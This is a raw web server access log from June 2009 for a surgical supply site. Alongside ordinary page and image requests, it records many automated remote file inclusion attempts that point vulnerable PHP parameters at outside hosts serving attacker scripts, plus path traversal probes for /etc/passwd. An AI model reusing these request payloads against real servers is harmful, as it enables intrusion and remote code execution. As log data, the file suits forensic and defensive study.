80.74.64.27 - - [10/Jun/2009:07:02:29 -0400] "GET /rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:07:02:31 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
62.173.171.118 - - [10/Jun/2009:07:02:36 -0400] "GET /logs/error_log.Q109041400//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://turgeonlaperle.com/modules/xoopsgallery/cache/idv6.txt????? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
62.173.171.118 - - [10/Jun/2009:07:02:36 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://turgeonlaperle.com/modules/xoopsgallery/cache/idv6.txt????? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
62.173.171.118 - - [10/Jun/2009:07:02:36 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://turgeonlaperle.com/modules/xoopsgallery/cache/idv6.txt????? HTTP/1.1" 404 246 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
62.173.171.118 - - [10/Jun/2009:07:02:42 -0400] "GET /logs/error_log.Q109051400//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://turgeonlaperle.com/modules/xoopsgallery/cache/idv6.txt????? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
85.214.56.221 - - [10/Jun/2009:07:02:53 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://roida.no-ip.org:7777/nv//includes/nwings.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.803"
85.214.56.221 - - [10/Jun/2009:07:02:53 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://roida.no-ip.org:7777/nv//includes/nwings.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.803"
85.214.56.221 - - [10/Jun/2009:07:02:53 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://roida.no-ip.org:7777/nv//includes/nwings.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
216.117.172.131 - - [10/Jun/2009:07:02:55 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jun/2009:07:02:55 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jun/2009:07:02:55 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
84.53.83.238 - - [10/Jun/2009:07:03:05 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/patientgraftingbrochure.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
84.53.83.238 - - [10/Jun/2009:07:03:05 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/patientgraftingbrochure.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
72.36.134.234 - - [10/Jun/2009:07:03:05 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
72.36.134.234 - - [10/Jun/2009:07:03:05 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
72.36.134.234 - - [10/Jun/2009:07:03:05 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
84.53.83.238 - - [10/Jun/2009:07:03:07 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/patientgraftingbrochure.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
84.53.83.238 - - [10/Jun/2009:07:03:07 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/patientgraftingbrochure.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727)"
216.117.172.131 - - [10/Jun/2009:07:03:23 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
72.36.134.234 - - [10/Jun/2009:07:03:38 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.232.143.238 - - [10/Jun/2009:07:03:41 -0400] "GET /?sourcedir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:07:03:56 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:07:03:56 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:07:03:56 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:07:03:57 -0400] "GET /logs/error_log.Q109052800/rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:07:03:57 -0400] "GET /rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:07:03:57 -0400] "GET /logs/rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
61.250.85.200 - - [10/Jun/2009:07:04:50 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.250.85.200 - - [10/Jun/2009:07:04:50 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
61.250.85.200 - - [10/Jun/2009:07:04:50 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jun/2009:07:04:51 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jun/2009:07:04:57 -0400] "GET /logs/error_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:07:04:59 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://roida.no-ip.org:7777/nv//includes/nwings.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.803"
85.214.56.221 - - [10/Jun/2009:07:04:59 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://roida.no-ip.org:7777/nv//includes/nwings.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.803"
85.214.56.221 - - [10/Jun/2009:07:04:59 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://roida.no-ip.org:7777/nv//includes/nwings.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
12.184.171.65 - - [10/Jun/2009:07:05:17 -0400] "GET /sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.livepurehealth.ca/store/partner/..-/test.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
12.184.171.65 - - [10/Jun/2009:07:05:17 -0400] "GET /logs/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.livepurehealth.ca/store/partner/..-/test.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
72.36.134.234 - - [10/Jun/2009:07:05:23 -0400] "GET /logs/access_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
61.250.85.200 - - [10/Jun/2009:07:05:23 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
77.221.152.82 - - [10/Jun/2009:07:05:27 -0400] "GET /logs//claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
77.221.152.82 - - [10/Jun/2009:07:05:27 -0400] "GET //claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
77.221.152.82 - - [10/Jun/2009:07:05:27 -0400] "GET /logs/access_log.Q109052900//claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
66.232.143.238 - - [10/Jun/2009:07:05:31 -0400] "GET /rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
72.36.134.234 - - [10/Jun/2009:07:05:34 -0400] "GET /logs/error_log.Q109052800%20%20//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
66.232.143.238 - - [10/Jun/2009:07:05:35 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
172.16.1.180 - - [10/Jun/2009:07:05:46 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:05:46 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:05:46 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
77.221.152.82 - - [10/Jun/2009:07:05:55 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
77.221.152.82 - - [10/Jun/2009:07:05:55 -0400] "GET /appserv/main.php?appserv_root=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
77.221.152.82 - - [10/Jun/2009:07:05:56 -0400] "GET /logs/appserv/main.php?appserv_root=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
77.221.152.82 - - [10/Jun/2009:07:06:10 -0400] "GET /logs/access_log.Q109050700/appserv/main.php?appserv_root=http://ldm.ru/docs/V7ID.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
144.122.156.242 - - [10/Jun/2009:07:06:12 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
144.122.156.242 - - [10/Jun/2009:07:06:15 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
144.122.156.242 - - [10/Jun/2009:07:06:33 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
144.122.156.242 - - [10/Jun/2009:07:06:33 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
172.16.1.180 - - [10/Jun/2009:07:06:47 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:06:47 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:06:47 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
174.143.3.188 - - [10/Jun/2009:07:06:50 -0400] "GET //png.php?include_path=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
174.143.3.188 - - [10/Jun/2009:07:06:50 -0400] "GET /logs/access_log.Q109053000//png.php?include_path=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
174.143.3.188 - - [10/Jun/2009:07:06:50 -0400] "GET /logs//png.php?include_path=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
124.217.216.86 - - [10/Jun/2009:07:06:58 -0400] "GET /logs/access_log.Q109052300/?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.826"
124.217.216.86 - - [10/Jun/2009:07:06:58 -0400] "GET /logs/?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 4902 "-" "libwww-perl/5.826"
124.217.216.86 - - [10/Jun/2009:07:06:58 -0400] "GET /?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.826"
124.217.216.86 - - [10/Jun/2009:07:06:58 -0400] "GET /logs/access_log.Q109052300/?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.826"
124.217.216.86 - - [10/Jun/2009:07:06:58 -0400] "GET /?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.826"
124.217.216.86 - - [10/Jun/2009:07:06:59 -0400] "GET /logs/?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 4902 "-" "libwww-perl/5.826"
216.14.117.22 - - [10/Jun/2009:07:07:00 -0400] "GET /?sourcedir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 200 409 "-" "libwww-perl/5.820"
124.217.216.86 - - [10/Jun/2009:07:07:07 -0400] "GET /logs/access_log.Q109052800/?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.826"
174.143.3.188 - - [10/Jun/2009:07:07:08 -0400] "GET /logs/error_log.Q109053000//png.php?include_path=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
124.217.216.86 - - [10/Jun/2009:07:07:09 -0400] "GET /logs/access_log.Q109052800/?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.826"
72.36.134.234 - - [10/Jun/2009:07:07:21 -0400] "GET /logs/access_log.Q109053000//png.php?include_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.811"
72.36.134.234 - - [10/Jun/2009:07:07:21 -0400] "GET //png.php?include_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 206 "-" "libwww-perl/5.811"
72.36.134.234 - - [10/Jun/2009:07:07:21 -0400] "GET /logs//png.php?include_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 211 "-" "libwww-perl/5.811"
62.173.171.118 - - [10/Jun/2009:07:07:24 -0400] "GET /logs/access_log.Q109052500//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://turgeonlaperle.com/modules/xoopsgallery/cache/idv6.txt????? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.59.12.99 - - [10/Jun/2009:07:07:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.180 - - [10/Jun/2009:07:07:47 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:07:47 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:07:47 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
72.36.134.234 - - [10/Jun/2009:07:07:52 -0400] "GET /logs/error_log.Q109053000//png.php?include_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.811"
144.122.156.242 - - [10/Jun/2009:07:09:00 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76245 "http://www.acesurgical.com/glustitch.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
144.122.156.242 - - [10/Jun/2009:07:09:05 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
89.223.3.98 - - [10/Jun/2009:07:09:05 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:09:05 -0400] "GET /logs/access_log.Q109052200/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:09:05 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
144.122.156.242 - - [10/Jun/2009:07:09:08 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
144.122.156.242 - - [10/Jun/2009:07:09:08 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
144.122.156.242 - - [10/Jun/2009:07:09:09 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
144.122.156.242 - - [10/Jun/2009:07:09:10 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
80.74.64.27 - - [10/Jun/2009:07:09:10 -0400] "GET /logs/access_log.Q109052800/rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
144.122.156.242 - - [10/Jun/2009:07:09:10 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
144.122.156.242 - - [10/Jun/2009:07:09:12 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
80.74.64.27 - - [10/Jun/2009:07:09:13 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
144.122.156.242 - - [10/Jun/2009:07:09:13 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
144.122.156.242 - - [10/Jun/2009:07:09:13 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
144.122.156.242 - - [10/Jun/2009:07:09:14 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
144.122.156.242 - - [10/Jun/2009:07:09:14 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
144.122.156.242 - - [10/Jun/2009:07:09:15 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
144.122.156.242 - - [10/Jun/2009:07:09:15 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
144.122.156.242 - - [10/Jun/2009:07:09:15 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
144.122.156.242 - - [10/Jun/2009:07:09:16 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
144.122.156.242 - - [10/Jun/2009:07:09:18 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
144.122.156.242 - - [10/Jun/2009:07:09:19 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
172.16.1.180 - - [10/Jun/2009:07:09:24 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:09:24 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:09:24 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
85.214.56.221 - - [10/Jun/2009:07:10:08 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:07:10:08 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:07:10:08 -0400] "GET /logs/access_log.Q109052200/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:07:10:20 -0400] "GET /logs/access_log.Q109051600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://roida.no-ip.org:7777/nv//includes/nwings.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.803"
85.214.56.221 - - [10/Jun/2009:07:10:32 -0400] "GET /logs/error_log.Q109052000/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
80.74.64.27 - - [10/Jun/2009:07:11:04 -0400] "GET /rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:07:11:11 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
